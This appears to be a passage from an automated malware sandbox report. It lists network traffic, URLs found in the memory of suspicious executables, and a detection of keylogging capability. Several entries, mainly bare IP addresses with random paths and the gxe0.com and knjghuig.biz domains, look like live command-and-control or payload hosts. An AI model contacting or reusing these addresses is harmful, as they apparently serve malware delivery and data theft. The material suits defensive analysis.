Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:48 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.143/kgrfegimyutt~
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.143/mbuec
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.2I
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/aatpwqmmnwrfjm
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquv
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquvf=
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquvo
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/qmpy
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/qmpyC
Source: alg.exe, 00000011.00000003.1561795732.000000000065D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107:80/eupqxdgegqjrgdpvd
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107:80/qmpy/
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/d
Source: Native_neworigin.exe, 0000000D.00000003.1569284648.0000000005392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/irvq
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq
Source: alg.exe, 00000011.00000003.1532040197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000065E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq5
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypqN
Source: alg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177:80/sqxdgegqjrgdpvi
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000011.00000003.2641931350.000000000062E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/btnkoeanfymxsstk
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/d
Source: alg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/hrkmkab
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/pnbkkgdjorsjoiow
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/s
Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/btnkoeanfymxsstkbat
Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/pnckkgdjorsjoiowPA
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://knjghuig.biz/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.le
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000011.00000003.2653651817.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2667859499.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.pmail.com
Source: alg.exe, 00000011.00000003.1966940811.0000000001590000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: alg.exe, 00000011.00000003.2537534713.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000011.00000003.2088475642.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000011.00000003.2090116293.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2090557256.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000011.00000003.2537614996.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/R
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020ADD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AF3000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AC8000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyH
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc9
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy2
Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000011.00000003.2537281630.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: alg.exe, 00000011.00000003.2718995164.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/8
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
